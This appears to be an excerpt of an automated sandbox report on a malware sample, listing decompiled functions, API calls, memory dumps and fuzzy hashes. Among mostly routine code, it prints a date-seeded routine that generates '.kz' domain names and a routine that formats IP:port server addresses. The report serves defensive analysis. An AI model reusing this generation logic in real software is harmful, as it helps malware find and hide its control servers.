GetHandleInformation.KERNEL32 ref: 00412DC7
CloseHandle.KERNEL32 ref: 00412E22
CloseHandle.KERNEL32 ref: 00412E31
WaitForSingleObject.KERNEL32 ref: 00412EA3

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Handle$Close$InformationObjectSingleWait
String ID:
API String ID: 135186658-0
Opcode ID: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
Instruction ID: eefc78a76a067577111aecbaeb0e7de47b452a34a27c7b211ac7547dace962ae
Opcode Fuzzy Hash: e5a4b129ae92d8d88fee5e4004c5104fc19af652de718fde7cfc4be735879905
Instruction Fuzzy Hash: B8312A74A003088BDB50EF69D6847DABBF4EF08310F04856AEC45EB345E779E895CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413A00 Relevance: 6.1, APIs: 4, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32(?,?,?,?,FFFFFFFF,?,0040FB75), ref: 00413A4C
GetCurrentThreadId.KERNEL32 ref: 00413A77
GetCurrentThreadId.KERNEL32 ref: 00413AA4

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentThread$ReleaseSemaphore
String ID:
API String ID: 1483290962-0
Opcode ID: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
Instruction ID: 6b0b4afb1b3186992077eecdeaba32eded2b69c28accb2d6c45d86a2178ee7f6
Opcode Fuzzy Hash: 843eff9c7fa453a6a21d8273f9d8158aafe4b9fad93c285ff7858f719f287fa3
Instruction Fuzzy Hash: CA2171357006058BDB20DF69D98439BB7B4EF40396F14843AD88687344E735EA86CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00415130 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 0041515D
free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 004151EB
free.MSVCRT(?,?,?,FFFFFFFF,?,004152D5), ref: 0041520F

Part of subcall function 00416080: calloc.MSVCRT ref: 004160BA
Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 0041610E
Part of subcall function 00416080: CreateSemaphoreA.KERNEL32 ref: 00416135
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 00416154
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041615F
Part of subcall function 00416080: InitializeCriticalSection.KERNEL32 ref: 0041616A

Strings

, xrefs: 0041514E

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphorecallocfree
String ID:
API String ID: 1811228352-3916222277
Opcode ID: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
Instruction ID: 4128b646aaba891ada79dfd1a06888151aadab1d0cf51ac5d6bc289caab5bcc4
Opcode Fuzzy Hash: 06ab00d90bc0c1de9f3d0d47dfa7f8a1f794360472c3a7af2a8bae076d9c70e2
Instruction Fuzzy Hash: BC217FB16047049FD710AF26D48039BBBE4EF84358F458C6EE9888B342E77DC994CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00413AF0 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00413B1F
CreateSemaphoreA.KERNEL32 ref: 00413B74

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CreateSemaphorecalloc
String ID:
API String ID: 194818478-0
Opcode ID: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
Instruction ID: 00fe0f0be2da5e732bebc1b04f87b074566867ad18d38b5108f8291d3f12238d
Opcode Fuzzy Hash: be592ff54935ea022d8ad1b5f88709ccb93884ab102ce677d5da886c338de866
Instruction Fuzzy Hash: A121DA71604305DFEB109F59C48438ABBE4EF40369F14886AED58CB386FB78D984CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004138D0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00413912
printf.MSVCRT ref: 00413965
GetCurrentThreadId.KERNEL32 ref: 00413973
printf.MSVCRT ref: 00413996

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
Instruction ID: 611bf596c6e15f060a768f0ba072d44477f6cdd3d242876fe9a2c858f071f05c
Opcode Fuzzy Hash: 57ee4d070de15427d656353f7a16ca92c078416b7c61adaa258012ce0576d536
Instruction Fuzzy Hash: AB2168B8A093009F8344DF1AD58481AFBE5FF89760F55896EF88897321D374E941CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB20 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 0040CB45
__dllonexit.MSVCRT ref: 0040CB83
_unlock.MSVCRT ref: 0040CBB3
_onexit.MSVCRT ref: 0040CBC7

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: __dllonexit_lock_onexit_unlock
String ID:
API String ID: 209411981-0
Opcode ID: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
Instruction ID: da490afd404eaf5b5c0649b7776465ff8fabc6fec02763ed850c7dc601e45c55
Opcode Fuzzy Hash: 8b1b58f89a79551562e3bfa36572f0ebcdc3d5ed823508bc3b8ba4bd712296a5
Instruction Fuzzy Hash: AF11A2B0A08301CBD700FF75E4C561EBBE0AB48344F904E3EF8D497391E67895888B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00415DD0 Relevance: 6.0, APIs: 4, Instructions: 46threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00415DF3
fprintf.MSVCRT ref: 00415E2F
GetCurrentThreadId.KERNEL32 ref: 00415E40
fprintf.MSVCRT ref: 00415E68

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID:
API String ID: 1384477639-0
Opcode ID: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
Instruction ID: 7d9a7ceed94e7cb146748a6a4cbe518f00b590a44153bc146dcbe4ea3ecfc3d4
Opcode Fuzzy Hash: dd6456fad9106398484d637a3b56d121495990f21139275fff810eafb9fbd7cc
Instruction Fuzzy Hash: 4711B378A087019FC700DF15D58851ABBE4FFC9714F54882EE98887325D774A949CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410FD0 Relevance: 6.0, APIs: 4, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00410FD0(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a52) {
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				long _t16;
				void* _t20;
				intOrPtr* _t22;
				long _t23;
				intOrPtr _t25;
				intOrPtr _t30;
				void* _t32;
				char** _t40;

				_t30 =  *0x422440; // 0x0
				if(_t30 == 0) {
					L4:
					asm("repe ret");
					L5:
					_t16 = GetCurrentThreadId();
					_a4 = 0;
					 *_t40 = "T%p %d %s\n";
					_a12 = _a52;
					_a8 = _t16;
					printf(??);
					L3:
					_t40 =  &(_t40[8]);
					goto L4;
				}
				_t40 = _t40 - 0x20;
				if(_a4 == 0) {
					goto L5;
				}
				 *_t40 = _a4;
				_t20 = E004107C0(_t32);
				 *_t40 = _a4;
				_t22 = E004107C0(_t32);
				_t23 = GetCurrentThreadId();
				 *_t40 = _a4;
				_t25 = E004107C0(_t32);
				_v28 =  *((intOrPtr*)(_t20 + 0x14));
				_v32 =  *_t22;
				_v36 = _t23;
				_v24 = _a8;
				 *_t40 = "T%p %d V=%0X H=%p %s\n";
				_v40 = _t25;
				printf(??);
				goto L3;
			}

APIs

GetCurrentThreadId.KERNEL32 ref: 00411005
printf.MSVCRT ref: 00411038
GetCurrentThreadId.KERNEL32 ref: 00411045
printf.MSVCRT ref: 00411066

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
Instruction ID: dd093ba78cb55f5ec8a20eb079ecf1fdcd36511c02614f1ce0a8f2dc342cb654
Opcode Fuzzy Hash: 0136eb576a22708db72ea732651a377116c2bb55362d5e09e34d873f1f1a2a00
Instruction Fuzzy Hash: 6611E5B4A0A301AFC754AF65D18455BBBE0FF88710F419C2EF49487311D778D8808F86

Uniqueness

Uniqueness Score: -1.00%

Function 00415060 Relevance: 6.0, APIs: 4, Instructions: 40threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041507F
printf.MSVCRT ref: 004150BE
GetCurrentThreadId.KERNEL32 ref: 004150D0
printf.MSVCRT ref: 004150EF

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CurrentThreadprintf
String ID:
API String ID: 2356641437-0
Opcode ID: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
Instruction ID: 356f6c3cb5459cc125aadc62c037ca1cfb0d2d0be776f4231c60a2ad830c665d
Opcode Fuzzy Hash: cf0f93176346ec6cfdc3d1e0bbbbb3b65b32d0a6126f1e44613399d4484d66ad
Instruction Fuzzy Hash: FC01EEB4A097109FC300DF15D19465BBBF0FF89710F14895EE88887324D3799945CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 024E92E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E92E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				struct _SYSTEMTIME _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v172;
				void* _t46;
				intOrPtr _t50;
				void* _t83;
				void* _t84;
				void* _t86;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					GetLocalTime( &_v28);
					_t46 = E024E97E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
					_t84 = _t83 + 0xc;
					_v12 = _t46 + _a12;
					_v32 = 0;
					while(_v32 < _a8) {
						E024E7D20( &_v172,  &_v172, 0, 0x80);
						_t50 = E024E8BB0( &_v12, 4,  &_v172, 0x80);
						_t86 = _t84 + 0x1c;
						_v40 = _t50;
						if(_v40 <= 0) {
							_v12 = _v32 * 7 + _v12;
						} else {
							_v12 = _v172;
						}
						_v36 = _v12 % 4 + 9;
						E024E9650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
						_t84 = _t86 + 0x10;
						lstrcatA(_v32 * 0x28 + _a4, ".kz");
						_v12 = _v12 + 1;
						_v8 = _v8 + 1;
						_v32 = _v32 + 1;
					}
				}
				return _v8;
			}

0x024e92e9
0x024e92f4
0x024e9308
0x024e931d
0x024e9322
0x024e9328
0x024e932b
0x024e933d
0x024e9357
0x024e9371
0x024e9376
0x024e9379
0x024e9380
0x024e9396
0x024e9382
0x024e9388
0x024e9388
0x024e93a8
0x024e93c4
0x024e93c9
0x024e93db
0x024e93e7
0x024e93f0
0x024e933a
0x024e933a
0x024e933d
0x024e93fe

APIs

GetLocalTime.KERNEL32(?), ref: 024E9308

Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8BFF
Part of subcall function 024E8BB0: GetLastError.KERNEL32 ref: 024E8C09
Part of subcall function 024E8BB0: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8C38
Part of subcall function 024E8BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 024E8C59
Part of subcall function 024E8BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 024E8C71
Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 024E8C99
Part of subcall function 024E8BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 024E8CC1
Part of subcall function 024E8BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 024E8CD5
Part of subcall function 024E8BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8CE1

lstrcatA.KERNEL32(00000000,.kz), ref: 024E93DB

Strings

.kz, xrefs: 024E93CC

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
String ID: .kz
API String ID: 2740484991-4216035510
Opcode ID: ac225c64d1b27d0444be886e01c8b918c966b40233b73283b2aef6790ad96559
Instruction ID: 48bafea023886e49cca7c309d95182fbca5624fd8c47e7d5a8432951e698e991
Opcode Fuzzy Hash: ac225c64d1b27d0444be886e01c8b918c966b40233b73283b2aef6790ad96559
Instruction Fuzzy Hash: 74312DB1D00209EBEF08DF95C885BEEB7B5EF58305F10845AE516A7380E778AA85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00413770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

:, xrefs: 00413821

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
String ID: :
API String ID: 4179344489-336475711
Opcode ID: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
Instruction ID: 7f2bcc72b8dabd0ea27cf558def7b07d1e8a971bd1b24fbec1df22c7a9c3dfa5
Opcode Fuzzy Hash: ddb51a8667e0b2c99a9a976caee8ac86576f4a5e265e37fbacc0abe2047e0c9e
Instruction Fuzzy Hash: 6E2153F07083019FD714AF25E54529ABBE0BF84348F45C82EE4C98B346D7B898C5CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00414F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

0, xrefs: 00414FE2

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AtomMutex$CloseCreateFindHandleObjectReleaseSingleSleepWaitfreemallocmemcpystrlen
String ID: 0
API String ID: 4179344489-4108050209
Opcode ID: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
Instruction ID: eb42ebfda6e5f1041a8337c8b64236a6e2dcba6debdfecdf6c0171dcc16b8b9a
Opcode Fuzzy Hash: 036017b5e4494f45137006ff93cdc31d63ef0284571abde27271dc241a7255c7
Instruction Fuzzy Hash: AE213DB06092559FC714EF25E59425ABBE0BBD0348F45882EE4894B351D7B898C9CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 10002430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2

Strings

@, xrefs: 10002453

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51

Uniqueness

Uniqueness Score: -1.00%

Function 024E78D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E024E78D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t46;

				_v5 = 0;
				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
					_v16 = 0;
					while(_v16 < _a8) {
						_t31 = E024E7B70( &_v12, _v16 * 6 + _a4, 4);
						_push(_v12);
						L024EB1EC();
						_v20 = _t31;
						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
						_t46 = _t46 + 0x20;
						_v16 = _v16 + 1;
					}
					_v5 = 1;
				}
				return _v5;
			}

0x024e78d6
0x024e78de
0x024e78f8
0x024e790a
0x024e7922
0x024e792d
0x024e792e
0x024e7933
0x024e795a
0x024e7960
0x024e7907
0x024e7907
0x024e7965
0x024e7965
0x024e796f

APIs

inet_ntoa.WS2_32(00000000), ref: 024E792E
wnsprintfA.SHLWAPI ref: 024E795A

Strings

%s:%u, xrefs: 024E7949

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: inet_ntoawnsprintf
String ID: %s:%u
API String ID: 890441721-1474915593
Opcode ID: 9601981735f34f9a8ee47ccb3e62b368826e22bed14fd57f89934b032640516d
Instruction ID: ea643ca2fd1bcc312cc1e6a09678e8088705fb4874f19c210934a142becba509
Opcode Fuzzy Hash: 9601981735f34f9a8ee47ccb3e62b368826e22bed14fd57f89934b032640516d
Instruction Fuzzy Hash: 5E118E71D04208EBFF04CF94C984BAEBBB5EF24319F00868EE916AA380D335E645CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD20 Relevance: 5.3, APIs: 4, Instructions: 296COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040FD56
free.MSVCRT ref: 0040FD65

Memory Dump Source

